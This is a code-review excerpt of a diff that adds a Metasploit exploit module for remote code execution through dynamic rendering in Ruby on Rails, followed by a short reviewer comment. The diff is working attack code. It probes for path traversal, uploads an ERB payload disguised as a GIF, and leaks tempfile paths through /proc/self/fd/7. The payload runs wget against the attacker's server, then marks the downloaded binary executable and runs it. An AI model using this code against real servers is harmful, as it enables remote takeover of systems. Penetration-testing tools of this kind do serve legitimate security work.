modules/exploits/multi/http/rails_dynamic_render_code_exec.rb

```diff
@@ -0,0 +1,246 @@
+      ], self.class)
+  end
+
+  def check
+
+    # this is the check for the dev environment
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2f"),
+      'method'    =>  'GET',
+    }, 60)
+
+    # if the page controller is dynamically rendering, its probably vuln
+    if res and res.body =~ /render params/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    # this is the check for the prod environment
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
+      'method'    =>  'GET',
+    }, 60)
+
+    # maybe its exploitable
+    if res and res.body =~ /ruby/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  def send_payload
+    @bd = rand_text_alpha(8+rand(8))
+    fn  = rand_text_alpha(8+rand(8))
+    un  = rand_text_alpha(8+rand(8))
+    pn  = rand_text_alpha(8+rand(8))
+    register_file_for_cleanup("/tmp/#{@bd}")
+    cmd  = "wget #{@service_url} -O /tmp/#{@bd};"
+    cmd << "chmod 755 /tmp/#{@bd};"
+    cmd << "/tmp/#{@bd}"
+    pay = "<%=`#{cmd}`%>"
+    print_status("uploading image...")
+    data = Rex::MIME::Message.new
+    data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'cookie' => @cookie,
+      'uri'    => normalize_uri(datastore['URIPATH'], pn),
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'data'   => data.to_s
+    })
+    if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)&gt;/
+      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)&gt;/
+      return true
+    else
+
+      # this is where we pull the log file
+      if leak_log
+        return true
+      end
+    end
+    return false
+  end
+
+  def leak_log
+
+    # path to the log /proc/self/fd/7
+    # this bypasses the extension check
+    res = send_request_cgi({
+      'uri'       =>  normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
+      'method'    =>  'GET',
+    }, 60)
+
+    if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
+      @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
+      return true
+    end
+    return false
+  end
+
+  def start_http_server
+    @pl = generate_payload_exe
+    @elf_sent = false
+    downfile = rand_text_alpha(8+rand(8))
+    resource_uri = '/' + downfile
+
+    # do not use SSL for the attacking web server
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
```

Comment:
Might not be a better way to avoid modifying the datastore, since what you've done is how ```HttpServer``` works. Agree on the other points.